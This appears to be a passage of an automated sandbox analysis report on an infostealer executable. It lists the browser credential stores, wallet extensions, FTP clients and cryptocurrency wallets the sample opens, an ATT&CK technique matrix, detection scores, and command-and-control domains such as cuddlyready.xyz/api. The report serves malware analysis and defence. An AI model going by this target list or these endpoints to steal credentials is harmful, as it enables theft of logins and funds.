                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                FjFeChttqA.exe67%VirustotalBrowse
                FjFeChttqA.exe63%ReversingLabsWin32.Infostealer.Tinba
                FjFeChttqA.exe100%AviraTR/Crypt.TPM.Gen
                FjFeChttqA.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                cuddlyready.xyz
                172.67.150.173
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  sendypaster.xyztrue
                    unknown
                    cuddlyready.xyztrue
                      unknown
                      steppriflej.xyztrue
                        unknown
                        ripe-blade.cyoutrue
                          unknown
                          greywe-snotty.cyoutrue
                            unknown
                            https://cuddlyready.xyz/apitrue
                              unknown
                              smash-boiling.cyoutrue
                                unknown
                                supporse-comment.cyoutrue
                                  unknown
                                  hosue-billowy.cyoutrue
                                    unknown
                                    pollution-raker.cyoutrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabFjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cuddlyready.xyz:443/apizchhhv.default-release/key4.dbPKFjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/ac/?q=FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoFjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://cuddlyready.xyz/pi_3FjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://cuddlyready.xyz:443/apilFjFeChttqA.exe, 00000000.00000003.2152897561.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153363662.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153298146.00000000060AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://cuddlyready.xyz/apipFjFeChttqA.exe, 00000000.00000003.2256614843.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
